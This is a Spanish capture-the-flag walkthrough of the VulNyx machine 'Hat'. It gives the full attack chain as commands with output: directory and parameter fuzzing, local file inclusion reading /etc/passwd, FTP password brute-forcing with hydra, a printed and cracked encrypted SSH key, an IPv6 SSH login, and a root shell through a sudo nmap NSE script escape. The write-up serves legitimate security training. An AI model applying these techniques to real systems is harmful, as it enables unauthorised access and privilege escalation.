🟠 NYX - Hat
#vulnyx #nyx #linux #lfi #ipv6 #ftp (bruteforce) #id_rsa (crack) #nmap (sudo)
Junio, 16, 2023 by Miguel R. (d4t4s3c)
Information
Hat es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad medio y fue creada por el usuario d4t4s3c.
- Acceso inicial: Mediante un archivo encontrado en el sitio web se enumera un nombre de usuario, en tenencia de un usuario se realiza fuerza bruta de password a FTP y al acceder se encuentra una clave privada (id_rsa) que permitirá acceder por IPv6 a SSH ya que el puerto por IPv4 se encuentra cerrado.
- Escalada de privilegios: El usuario dispone de permisos sudo sobre un binario que permitirá convertirse en root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 12:59 CET
Nmap scan report for 192.168.1.37
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
65535/tcp open unknown
❯ nmap -sVC -p80,65535 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 13:02 CET
Nmap scan report for 192.168.1.37
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
65535/tcp open ftp pyftpdlib 1.5.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.37:65535
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
Shell (cromiphi)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/logs (Status: 301) [Size: 311] [--> http://192.168.1.37/logs/]
/php-scripts (Status: 301) [Size: 318] [--> http://192.168.1.37/php-scripts/]
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
/logs
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/logs/ -x log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/logs/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: log
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/vsftpd.log (Status: 200) [Size: 1760]
Progress: 441092 / 441094 (100.00%)
===============================================================
Finished
===============================================================
/php-scripts
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.37/php-scripts/ -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/php-scripts/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/file.php (Status: 200) [Size: 0]
/.php (Status: 403) [Size: 277]
Progress: 441092 / 441094 (100.00%)
===============================================================
Finished
===============================================================
Revisando el contenido del archivo vsftpd.log enumero el usuario admin_ftp
❯ curl -sX GET 'http://192.168.1.37/logs/vsftpd.log'
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
Local File Inclusion (LFI)
Reviso el archivo file.php ubicado en la ruta /php-scripts
Parameter Brute Force
Mediante fuerza bruta descubro el parámetro vulnerable llamado 6
❯ wfuzz -c -w /opt/common.txt -u 'http://192.168.1.37/php-scripts/file.php?FUZZ=/etc/passwd' --hh=0 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.37/php-scripts/file.php?FUZZ=/etc/passwd
Total requests: 4727
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000185: 200 26 L 38 W 1404 Ch "6"
Total time: 2.737478
Processed Requests: 4727
Filtered Requests: 4726
Requests/sec.: 1726.771
Enumero a los usuarios cromiphi y root desde el archivo /etc/passwd
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/etc/passwd" |grep "sh$"
root:x:0:0:root:/root:/bin/bash
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
IPv6
Obtengo la dirección IPv6 apuntando al archivo /proc/net/if_inet6 ya que el puerto 22 se encuentra en estado filtered y puede resultar útil para fururos ataques
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/proc/net/if_inet6"
00000000000000000000000000000001 01 80 10 80 lo
fe800000000000000a0027fffe69bdca 02 40 20 80 enp0s3
Convierto la dirección IPv6 a un formato correcto
❯ curl -sX GET "http://192.168.1.37/php-scripts/file.php?6=/proc/net/if_inet6" |awk 'NR==2 {print $1}' | fold -w4 | paste -sd ":"
fe80:0000:0000:0000:0a00:27ff:fe69:bdca
65535/TCP (FTP)
Password Brute Force
Al disponer del usuario admin_ftp realizo fuerza bruta a FTP y obtengo éxito con las credenciales admin_ftp:cowboy
❯ hydra -t 64 -l admin_ftp -P /opt/techyou.txt ftp://192.168.1.37:65535 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-02 13:50:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ftp://192.168.1.37:65535/
[65535][ftp] host: 192.168.1.37 login: admin_ftp password: cowboy
[STATUS] attack finished for 192.168.1.37 (valid pair found)
Accedo al ftp con las credenciales obtenidas y descargo todos los archivos disponibles
❯ lftp -u 'admin_ftp,cowboy' 192.168.1.37 -p 65535
lftp admin_ftp@192.168.1.37:~> ls
drwxrwxrwx 2 cromiphi cromiphi 4096 Sep 28 2021 share
lftp admin_ftp@192.168.1.37:/> cd share
lftp admin_ftp@192.168.1.37:/share> ls
-rwxrwxrwx 1 cromiphi cromiphi 1751 Sep 28 2021 id_rsa
-rwxrwxrwx 1 cromiphi cromiphi 108 Sep 28 2021 note
lftp admin_ftp@192.168.1.37:/share> mget *
1859 bytes transferred
Total 2 files transferred
En el archivo note comentan que han securizado algunos protocolos critícos
❯ cat note
Hi,
We have successfully secured some of our most critical protocols ... no more worrying!
Sysadmin
El archivo id_rsa como era de esperar, es una clave privada de SSH y se encuentra protegida por un password
❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2
JmLJqI4m9jk1McrIzNFyuYrPyPu3Znw6awuyEIK0ZctgYabjNk5MVCM0FH45SQCl
rqK3QqSACiOq4+DnMWrECj5CO+JPzGjIupgz8IrW0Cr7mkRSNa9fCeEBrIzAi924
GEM72PMuwlBM4zWDZ/962gtZpDnzXYLc9mYdVTe+ubI2NrVC6d2ak1L5GMsBdYwi
BVj8bhnUsr4doXi1ZcRAZoHUses/Z8ohfNXkUoDO2d1kQmiE0hAVEUnBerzV+E84
GpJFBgHphboG9E+R3Gh27viM3pY0qFvU/PWbTJ8Y6LgSgJPMLldlEuBEym0LPDpc
27L7wdKEYwCjPWBGtuGnKsdfleQfsyKijH8/YDlH0hsrDc83ZMcDR13jtfZbZjHZ
IwVdhUuKdHp6Ig4lmxi1RqJA35CD6ZHHMzOKlm1TjQskA0j6jdPeJ3o5ebh/z3oe
tr3FKEawz+2KQa+CX+frCwN/rLFUc8MOvh7I4/jJ9o2kdKB0u5OHH+pgXfmhTJzl
mVSqOtti7cxefUb142Jltku5kElwKdvVEHw+qmZNMwrw+Kv7rlpvezfsW4uzm8Je
nlmxXoMl62Z3FKPjKarEqZrbO6bHf6lWAIrJgJGydRn1tpD/IY1DJZKwa0aLrkbr
7hu8C0LSpIVdy5ZUSaT04ZL/FBxDQR7cg2/ZYF5Kc1pvIgjXrlEsbbSPDyg2bLIW
eCMRnevvsTS8l55qUvQ2GO73kHMcWfkAsvUaojLiSxXGTcd+gPf6kXiwTbz2wbTR
KPzDwKaTn74yW+9jc88+6D8CdT6OrN+2eP8K0ukdNwMqVc+Mag0TOOCwq+QVfKwf
O7A+3+13xjUy1/TKRIJDXuhL88RDrzA7U4uy9ZDYEq5z2HVc3agqnHMBP4k2n0KE
u2YoCNOp52Q4YpKoXoz5Ojw8CuUIhNqoilh/0j+gkdgIO5jMAEBT7p6M/fnhfHpe
VNCimSJfTjLCU49Tez0HeDDCuE4oG/vShjM0ebZHMMWTY8vVOaRz4Ktcx938Jpnj
/j9Z0NEAEUI2ISZGGDLS/O0fhyN9lsl1UrY2yR3NnXgbX3YkjWLDM4C8mWSCejpl
XhWSUYlt8X83atlUfTcn97QVGeJXvlJhBUrYEtsTHjDc2lsH3KQNYtpckQizpcyW
axJjIeWhI+eqWIVwsXTxKI2hIa6XuYdjUP7cusDad+pUo1Y7h0wTwLP1KYtkXrm3
sEvB8X2mX6tHB+1iO67UKjFdZ7Ti1Q2XY6zCCbOl3S5b24MFAFANDYgkr1QtgQqs
j+tSrrd1yOn4AeM6SdyLdVxKQBY2s0+9dvLmaJLH9OOdV0G4I4WcMuum40WMzXrf
fBAMIh7Gl0lEWPOrPtOxrQI++kAlyzNTK1oxSvdc/f30TOB4hGH8yU3EKzRh/QTa
fHkcKP9V7Y0xKwrg2yLuWsFSt4QnFUZEbV+wDq2i9NqvriYOxSa2qarPP04FVZRp
5xYdSGWdMuPFTEAaM+67wR33zzlYKvnEmE9CRHnAqVpqHFuNmgYD+S3KhzW3X1A3
zlflWacIB06p/cXCr3w6XNqa0y2TsNmuT2IR6JX+Qr6usNV4QWL/Jyyy4dE1oBG6
-----END RSA PRIVATE KEY-----
22/TCP (SSH)
id_rsa (Cracking)
Obtengo el password ilovemyself con RSAcrack
❯ RSAcrack -k id_rsa -w /opt/techyou.txt
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: VulNyx™ ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /opt/techyou.txt
[*] Status | 1594/10000/15%/ilovemyself
[+] Password | ilovemyself
─────────────────────────────
Como se puede observer el puerto 22 se encuentra filtered en IPv4 y open por IPv6
❯ nmap -p22 192.168.1.37 | grep "tcp"
22/tcp filtered ssh
❯ nmap -6 -p22 fe80:0000:0000:0000:0a00:27ff:fe69:bdca | grep "tcp"
22/tcp open ssh
Accedo al sistema como usuario cromiphi por IPv6 con la id_rsa
❯ ssh -i id_rsa -6 cromiphi@'fe80:0000:0000:0000:0a00:27ff:fe69:bdca%eth0'
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@hat:~$ id ; hostname
uid=1000(cromiphi) gid=1000(cromiphi) grupos=1000(cromiphi)
hat
Privilege Escalation
El usuario cromiphi puede ejecutar como root el binario nmap con sudo
cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cromiphi may run the following commands on hat:
(root) NOPASSWD: /usr/bin/nmap
En GTFOBins nos dan el one liner con la secuencia de shell escape y me convierto en usuario root
cromiphi@hat:~$ echo -n 'os.execute("/bin/sh")' > /dev/shm/root.nse
cromiphi@hat:~$ sudo -u root /usr/bin/nmap --script=/dev/shm/root.nse
# bash -i
root@hat:~i# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
hat
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@hat:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
d3ea66f*************************
8b4acc3*************************
Hasta aquí la resolución de la máquina Hat.
Happy Hacking!
© d4t4s3c 2023-2025